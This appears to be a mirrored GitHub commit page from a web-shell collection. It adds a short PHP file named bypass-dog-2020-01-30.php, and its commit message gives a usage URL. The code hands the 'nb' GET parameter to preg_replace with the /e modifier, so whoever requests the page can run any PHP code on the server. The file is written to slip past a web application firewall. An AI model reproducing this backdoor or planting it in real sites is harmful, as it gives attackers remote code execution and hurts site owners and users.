mirror of
https://github.com/tennc/webshell.git
synced 2025-12-25 09:09:01 +00:00
Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo() form: WX公众号 “ 渗透云笔记” Sigsh 新年从过狗开始
This commit is contained in:
12
php/bypass-dog-2020-01-30.php
Normal file
12
php/bypass-dog-2020-01-30.php
Normal file
@@ -0,0 +1,12 @@
|
||||
<?php
|
||||
class SBdog{
|
||||
public $x;
|
||||
function dog(){
|
||||
$this->x=$_GET['nb'];
|
||||
}
|
||||
}
|
||||
$class=new SBdog();
|
||||
$class->dog();
|
||||
$a=$class->x;
|
||||
preg_replace("/dog/e", $a, "I am a sb dog");
|
||||
?>
|
||||
Reference in New Issue
Block a user